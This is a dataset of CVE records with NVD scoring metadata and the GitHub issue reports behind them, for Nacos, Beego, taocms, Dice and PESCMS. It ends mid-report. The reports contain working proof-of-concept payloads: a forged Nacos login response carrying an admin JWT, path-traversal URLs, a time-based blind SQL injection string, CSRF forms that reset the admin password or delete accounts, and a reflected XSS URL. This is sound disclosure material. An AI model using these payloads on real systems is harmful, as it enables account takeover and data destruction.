[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "alibaba", "nacos" ]
<!-- Here is for bug reports and feature requests ONLY! If you're looking for help, please check our mail list、WeChat group and the Gitter room. Please try to use English to describe your issue, or at least provide a snippet of English translation. 我们鼓励使用英文,如果不能直接使用,可以使用翻译软件,您仍旧可以保留中文原文。 --> **Describe the bug** A clear and concise description of what the bug is. A vulnerability was found that could cause any existing user to log in **Expected behavior** A clear and concise description of what you expected to happen. **Acutally behavior** A clear and concise description of what you actually to happen. **How to Reproduce** Steps to reproduce the behavior: 1. Download the latest version of NacOS 2. Access prompt page ![image](https://user-images.githubusercontent.com/55682875/138857409-cc779f67-b9fd-4327-b8f0-d03dedb34997.png) 3. Enter any user name and password,Click login to capture packets Change the returned package to the following ![image](https://user-images.githubusercontent.com/55682875/138857718-6502839e-9ccc-4a69-93fa-7a52c863eb5c.png) ![image](https://user-images.githubusercontent.com/55682875/138857971-0a29d44b-a1c4-4591-bca5-f61e240b4697.png) HTTP/1.1 200 Server: nginx/1.19.6 Date: Sun, 11 Apr 2021 01:48:17 GMT Content-Type: application/json;charset=UTF-8 Connection: close Vary: Origin Vary: Access-Control-Request-Method Vary: Access-Control-Request-Headers Access-Control-Allow-Origin: http://47.93.46.78:9090 Access-Control-Allow-Credentials: true Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA Content-Length: 162 {"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true} 4. We can see the successful login ![image](https://user-images.githubusercontent.com/55682875/138858120-f649a88a-9142-4224-950b-f65ab8ca0c1e.png) **Desktop (please complete the following information):** - OS: [e.g. Centos] - Version [All] - Module [e.g. naming/config] - SDK [e.g. original, spring-cloud-alibaba-nacos, dubbo] **Additional context** Add any other context about the problem here.
A vulnerability was found that could cause any existing user to log in
https://api.github.com/repos/alibaba/nacos/issues/7127/comments
0
2021-10-26T10:13:19Z
2021-11-05T07:23:20Z
https://github.com/alibaba/nacos/issues/7127
1,036,102,526
7,127
3,819
CVE-2021-43116
2022-07-05T14:15:08.767
An Access Control vulnerability exists in Nacos 2.0.3 in the access prompt page; enter username and password, click on login to capture packets and then change the returned package, which lets a malicious user login.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "http://packetstormsecurity.com/files/171638/Nacos-2.0.3-Access-Control.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/alibaba/nacos/issues/7127" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/alibaba/nacos/issues/7182" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://packetstormsecurity.com/files/171638/Nacos-2.0.3-Access-Control.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/alibaba/nacos/issues/7127" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/alibaba/nacos/issues/7182" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*", "matchCriteriaId": "92C071B9-CC45-4164-986C-9DDE011EAB15", "versionEndExcluding": null, "versionEndIncluding": "2.0.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "287" ]
287
https://github.com/alibaba/nacos/issues/7182
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "alibaba", "nacos" ]
The steps to reproduce.可复现问题的步骤 ![image](https://user-images.githubusercontent.com/55682875/140475848-075a12bc-8e10-4e02-becf-59c91f9abe10.png)1.Download the latest version of NacOS https://github.com/alibaba/nacos/ 2.Follow the steps for installation 3.After the installation is successful, access the default login page ![image](https://user-images.githubusercontent.com/55682875/140471673-1f00c1f2-4bbc-4e2f-a3af-a62578c6ce06.png) 4.Enter any account and password Click login and the login failed ![image](https://user-images.githubusercontent.com/55682875/140474830-999bbf98-0501-4077-947f-77323a194ba0.png) 5.Caught at login time ![image](https://user-images.githubusercontent.com/55682875/140474983-61792caa-78ce-46f4-a166-538387322f7e.png) Intercepting return packet ![image](https://user-images.githubusercontent.com/55682875/140475444-6270417c-e0ea-48ce-9d7a-981b3d87063e.png) The intercepted return packet is ![image](https://user-images.githubusercontent.com/55682875/140475523-b3d7a065-0a37-44c5-b9a7-ddf387bacc41.png) 6.Replace returns the package and lets it pass ![image](https://user-images.githubusercontent.com/55682875/140475685-52337eb2-cc31-404c-97bd-5d69e0cf076a.png) The packet is: HTTP/1.1 200 Server: nginx/1.19.6 Date: Sun, 11 Apr 2021 01:48:17 GMT Content-Type: application/json;charset=UTF-8 Connection: close Vary: Origin Vary: Access-Control-Request-Method Vary: Access-Control-Request-Headers Access-Control-Allow-Origin: http://47.93.46.78:9090 Access-Control-Allow-Credentials: true Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA Content-Length: 162 {"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true} 7.At this point you can see that you have successfully entered the background ![image](https://user-images.githubusercontent.com/55682875/140475848-075a12bc-8e10-4e02-becf-59c91f9abe10.png) The reason for this problem is that NACOS uses the default JWT key
Found a login background vulnerability
https://api.github.com/repos/alibaba/nacos/issues/7182/comments
5
2021-11-05T07:48:43Z
2022-10-10T07:34:31Z
https://github.com/alibaba/nacos/issues/7182
1,045,534,980
7,182
3,820
CVE-2022-31836
2022-07-05T15:15:08.750
The leafInfo.match() function in Beego v2.0.3 and below uses path.join() to deal with wildcardvalues which can lead to cross directory risk.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/advisories/GHSA-95f9-94vc-665h" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/beego/beego/issues/4961" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/advisories/GHSA-95f9-94vc-665h" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/beego/beego/issues/4961" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:beego:beego:*:*:*:*:*:*:*:*", "matchCriteriaId": "6F33069D-EE29-428D-A087-595B51047BEB", "versionEndExcluding": null, "versionEndIncluding": "2.0.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/beego/beego/issues/4961
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "beego", "beego" ]
Function leafInfo.match() use path.join() to deal with `wildcardValues`, which may lead to cross directory risk. - **poc1: route end with `*.*` can use `../` to cross directory and set evil value for `:path` .** https://github.com/beego/beego/blob/64cf44d725c8cc35d782327d333df9cbeb1bf2dd/server/web/tree.go#L414 https://github.com/beego/beego/blob/64cf44d725c8cc35d782327d333df9cbeb1bf2dd/server/web/tree.go#L431 For route `/book1/:name/fixPath1/*.*` , urls below can match, and set `:path=evil` `/book1/name1/fixPath1/mybook/../evil.txt` =>`:name=name1` `/book1/name1/fixPath1/mybook/../././evil.txt` =>`:name=name1` `/book1/name1/fixPath1/mybook/../././////evil.txt` =>`:name=name1` `/book1/../fixPath1/mybook/../././////evil.txt` =>`:name=..` `/book1/./fixPath1/mybook/../././////evil.txt` =>`:name=.` ![image](https://user-images.githubusercontent.com/5164276/170035449-3060b4f1-9f6f-4ec0-a9c1-b1d2777f3d8a.png) ```go //Test code as below: web.Router("/book1/:name/fixPath1/*.*", &controllers.BookController{}, "get:SearchByName") func (b BookController) SearchByName() { fmt.Println(":path=" + b.Ctx.Input.Param(":path")) fmt.Println(":name=" + b.Ctx.Input.Param(":name")) b.Data["json"] = "OK" b.ServeJSON() } ``` - **poc2: regex route can use `../` to cross directory and replace wildcard with evil value** https://github.com/beego/beego/blob/64cf44d725c8cc35d782327d333df9cbeb1bf2dd/server/web/tree.go#L445 For regex route `/book2/:type:string/fixPath1/:name`,urls below can match and value of `:type` `:name` can be replaced with evil value. `/book2/type1/fixPath1/name1/../../evilType/evilName` => `:type=evilType :name=evilName` `/book2/type1/fixPath1/name1/../../././evilType/evilName` => `:type=evilType :name=evilName` `/book2/type1/fixPath1/name1/../../././////evilType/evilName`=> `:type=evilType :name=evilName` ![image](https://user-images.githubusercontent.com/5164276/170036370-a1904944-29fa-4e5e-bbe8-a8c3381ad3b3.png) ```go //Test code as below: web.Router("/book2/:type:string/fixPath1/:name", &controllers.BookController{}, "get:SearchByType") func (b BookController) SearchByType() { fmt.Println(":name=" + b.Ctx.Input.Param(":name")) fmt.Println(":type=" + b.Ctx.Input.Param(":type")) b.Data["json"] = "OK" b.ServeJSON() } ```
Function leafInfo.match() use path.join() to deal with `wildcardValues`, which may lead to cross directory risk.
https://api.github.com/repos/beego/beego/issues/4961/comments
4
2022-05-23T12:59:50Z
2022-06-02T02:12:06Z
https://github.com/beego/beego/issues/4961
1,245,131,363
4,961
3,821
CVE-2021-44915
2022-07-05T18:15:07.797
Taocms 3.0.2 was discovered to contain a blind SQL injection vulnerability via the function Edit category.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/8" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taogogo:taocms:3.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "AA84748C-B58B-4A72-A527-7FF567BACCC2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/taogogo/taocms/issues/8
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "taogogo", "taocms" ]
Log in to the background as the default account admin. ![1](https://user-images.githubusercontent.com/47633517/144992861-6bbaa6ec-fe07-4641-9596-193c4fd9315c.png) We click in order and grab packets: ![2](https://user-images.githubusercontent.com/47633517/144993925-44418ab5-2601-47cb-8c81-5ee822c3fa9d.png) ![3](https://user-images.githubusercontent.com/47633517/144993935-3a8f5790-c77b-439e-a29a-1bf6d80cc23c.png) ![4](https://user-images.githubusercontent.com/47633517/144993941-34e87899-1eae-450e-b7f6-89c6e91ae663.png) There is a time-based blind SQL injection vulnerability in the location of id. ![5](https://user-images.githubusercontent.com/47633517/144994546-5f75af11-e54a-4e82-8cfd-efb35231e400.png) ![6](https://user-images.githubusercontent.com/47633517/144994554-51aa2e7c-63c4-4532-9f62-8225bdcd31ae.png) POC: http://192.168.102.129:82/admin/admin.php post:name=test&nickname=test&fid=&cattpl=&listtpl=&distpl=&intro=test&orders=0&status=1&action=category&id=3) AND (SELECT 8663 FROM (SELECT(SLEEP(10)))IUse) AND (6655=6655&ctrl=update&Submit=%E6%8F%90%E4%B sqlmap: Save the HTTP request package as a file . ![7](https://user-images.githubusercontent.com/47633517/144995527-671160c5-222f-4163-8d9a-658040c53d6f.png) Test using the SQLMap tool : ![8](https://user-images.githubusercontent.com/47633517/144995528-254db374-fd34-48f6-9a45-c9abe3f6f094.png)
There is SQL blind injection at "Edit category"(Column administrator authority)
https://api.github.com/repos/taogogo/taocms/issues/8/comments
0
2021-12-07T08:51:23Z
2021-12-07T08:51:23Z
https://github.com/taogogo/taocms/issues/8
1,073,082,158
8
3,822
CVE-2022-32413
2022-07-05T20:15:08.237
An arbitrary file upload vulnerability in Dice v4.2.0 allows attackers to execute arbitrary code via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/bihell/Dice/issues/157" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/bihell/Dice/issues/157" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dice_project:dice:4.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "19630FFB-7EB6-4FBE-85A5-61C4D99039DB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/bihell/Dice/issues/157
[ "Exploit", "Third Party Advisory" ]
github.com
[ "bihell", "Dice" ]
1、Any file upload vulnerability in the following code can cause RCE ![image](https://user-images.githubusercontent.com/43632720/171532648-cbc6a5db-7f81-45ca-95fb-523b97da0136.png) 2、Follow up the code、Files are directly uploaded to the server without filtering ![image](https://user-images.githubusercontent.com/43632720/171533094-f94b2f17-1c8b-4b19-a9fd-c57ffeed6487.png)
any file upload vuln
https://api.github.com/repos/bihell/Dice/issues/157/comments
1
2022-06-02T02:09:43Z
2023-06-29T01:52:43Z
https://github.com/bihell/Dice/issues/157
1,257,523,671
157
3,823
CVE-2021-31676
2022-07-06T13:15:08.887
A reflected XSS was discovered in PESCMS-V2.3.3. When combined with CSRF in the same file, they can cause bigger destruction.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/RO6OTXX/pescms_vulnerability" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/lazyphp/PESCMS-TEAM/issues/7" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/two-kisses/pescms_vulnerability%2C" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/RO6OTXX/pescms_vulnerability" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/lazyphp/PESCMS-TEAM/issues/7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/two-kisses/pescms_vulnerability%2C" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pescms:pescms_team:2.3.3:*:*:*:*:*:*:*", "matchCriteriaId": "B86D2EF3-C36E-45D0-BB3E-BCF0111F597F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/lazyphp/PESCMS-TEAM/issues/7
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "lazyphp", "PESCMS-TEAM" ]
## Cross Site Request Forgery(CSRF)-1 ### modify admin's password ,mail,phone and head-image. Technical Description: file : ` pescms/App/Team/PUT/User.php` The function of this file is to Modify personal information,but it don't Verify whether the operation is legal. Through it attackers can modify admin's password ,mail,phone and head-image. Proof of Concept(PoC) ```<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/pescms/Public/?g=Team&m=User&a=setting" method="POST"> <input type="hidden" name="method" value="PUT" /> <input type="hidden" name="name" value="admin" /> <input type="hidden" name="mail" value="123456&#64;qq&#46;com" /> <input type="hidden" name="phone" value="" /> <input type="hidden" name="password" value="newadmin" /> <input type="hidden" name="home" value="Team&#45;Index&#45;index" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` ![1](https://user-images.githubusercontent.com/74637464/115212023-b1e5db80-a132-11eb-886f-d330053f3c5c.png) Success.And the password of admin has been modify. ![2](https://user-images.githubusercontent.com/74637464/115212028-b3170880-a132-11eb-9506-d394abc1dfa9.png) ## Cross Site Request Forgery(CSRF)-2 ### Delete the administrator and other member's account number Technical Description: file: ``` pescms/App/Team/DELETE/Content.php pescms/App/Team/DELETE/Field.php ``` Throught it can delete Any member and administrator just by modify the 'id' that in Url. Delete the Account number of administrator just need to modify the id as '1'. ![3](https://user-images.githubusercontent.com/74637464/115212030-b3af9f00-a132-11eb-96fa-a335b758d727.png) Proof of Concept(PoC) ``` <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/pescms/Public/?g=Team&m=User&a=action&id=36&method=DELETE&back_url=L3Blc2Ntcy9QdWJsaWMvP2c9VGVhbSZtPVVzZXImYT1pbmRleA==" method="POST"> <input type="hidden" name="" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` Visit this page of poc: ![4](https://user-images.githubusercontent.com/74637464/115212032-b4483580-a132-11eb-8ee1-b0bc75834103.png) ![5](https://user-images.githubusercontent.com/74637464/115212034-b4483580-a132-11eb-94be-9ff390d03112.png) We refresh the list of user ,that find that the user that called light is deleted. ![6](https://user-images.githubusercontent.com/74637464/115212037-b4e0cc00-a132-11eb-8bb4-2319a386dbad.png) ## Cross Site Request Forgery(CSRF)-3 ### Delete import information Technical Description: file: ``` pescms/App/Team/DELETE/Attachment.php pescms/App/Team/DELETE/Content.php pescms/App/Team/DELETE/Field.php pescms/App/Team/DELETE/Model.php pescms/App/Team/DELETE/Notice.php ``` Through CSRF to Delete important data is exist in these files. ALL the delete operations are not verify in front page. Like this: ![7](https://user-images.githubusercontent.com/74637464/115212039-b5796280-a132-11eb-926c-66c4b17959b4.png) Proof of Concept(PoC) ``` <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/pescms/Public/?g=Team&m=Project&a=action&id=1&method=DELETE&back_url=L3Blc2Ntcy9QdWJsaWMvP2c9VGVhbSZtPVByb2plY3QmYT1pbmRleA==" method="POST"> <input type="hidden" name="" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` ![8](https://user-images.githubusercontent.com/74637464/115212046-b5796280-a132-11eb-93cd-ba04d2aff28a.png) refresh: ![9](https://user-images.githubusercontent.com/74637464/115212050-b611f900-a132-11eb-9670-a11f1b3b1d68.png) And other operations of delete are exist on this cms. Just give the positions,don't prove. ![10](https://user-images.githubusercontent.com/74637464/115212053-b6aa8f80-a132-11eb-92e5-1c1011502f59.png) ![11](https://user-images.githubusercontent.com/74637464/115212056-b7432600-a132-11eb-8fcb-2f48476afed5.png) ## Reflected XSS in App/Team/GET/Repoort.php ### In the method of extract, the CSRF also exist , but this is to prove the Rdflected XSS,not CSRF. In line 72-78 , the data from $_GET('begin') and $_GET('end') is transfer to variables, and output in pages. ![12](https://user-images.githubusercontent.com/74637464/115212061-b7432600-a132-11eb-9493-e2c13bf965e0.png) Proof of Concept(PoC) ``` localhost/pescms/Public/?g=Team&m=Report&a=extract&begin="onmouseover=alert(1)//&end=&user=0 or localhost/pescms/Public/?g=Team&m=Report&a=extract&begin=&end="onmouseover=alert(1)//&user=0 or,page: http://localhost/pescms/Public/?g=Team&m=Report&a=allExtract&begin="onmouseover=alert(1)//&end=&user=0 ``` ![13](https://user-images.githubusercontent.com/74637464/115212063-b7dbbc80-a132-11eb-8ef3-db3d91dcc9e2.png) ## In this page ,Reflected XSS can be combined with CSRF,this will cause bigger destruction
There are some vulnerabilities in cms.
https://api.github.com/repos/lazyphp/PESCMS-TEAM/issues/7/comments
1
2021-04-19T09:20:03Z
2021-04-19T09:29:30Z
https://github.com/lazyphp/PESCMS-TEAM/issues/7
861,094,547
7
3,824
CVE-2021-31677
2022-07-06T13:15:09.040
An issue was discovered in PESCMS-V2.3.3. There is a CSRF vulnerability that can modify admin and other members' passwords.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/RO6OTXX/pescms_vulnerability" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/lazyphp/PESCMS-TEAM/issues/7%2C" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/two-kisses/pescms_vulnerability%2C" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/RO6OTXX/pescms_vulnerability" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/lazyphp/PESCMS-TEAM/issues/7%2C" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/two-kisses/pescms_vulnerability%2C" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pescms:pescms_team:2.3.3:*:*:*:*:*:*:*", "matchCriteriaId": "B86D2EF3-C36E-45D0-BB3E-BCF0111F597F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/lazyphp/PESCMS-TEAM/issues/7%2C
null
github.com
[ "lazyphp", "PESCMS-TEAM" ]
## Cross Site Request Forgery(CSRF)-1 ### modify admin's password ,mail,phone and head-image. Technical Description: file : ` pescms/App/Team/PUT/User.php` The function of this file is to Modify personal information,but it don't Verify whether the operation is legal. Through it attackers can modify admin's password ,mail,phone and head-image. Proof of Concept(PoC) ```<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/pescms/Public/?g=Team&m=User&a=setting" method="POST"> <input type="hidden" name="method" value="PUT" /> <input type="hidden" name="name" value="admin" /> <input type="hidden" name="mail" value="123456&#64;qq&#46;com" /> <input type="hidden" name="phone" value="" /> <input type="hidden" name="password" value="newadmin" /> <input type="hidden" name="home" value="Team&#45;Index&#45;index" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` ![1](https://user-images.githubusercontent.com/74637464/115212023-b1e5db80-a132-11eb-886f-d330053f3c5c.png) Success.And the password of admin has been modify. ![2](https://user-images.githubusercontent.com/74637464/115212028-b3170880-a132-11eb-9506-d394abc1dfa9.png) ## Cross Site Request Forgery(CSRF)-2 ### Delete the administrator and other member's account number Technical Description: file: ``` pescms/App/Team/DELETE/Content.php pescms/App/Team/DELETE/Field.php ``` Throught it can delete Any member and administrator just by modify the 'id' that in Url. Delete the Account 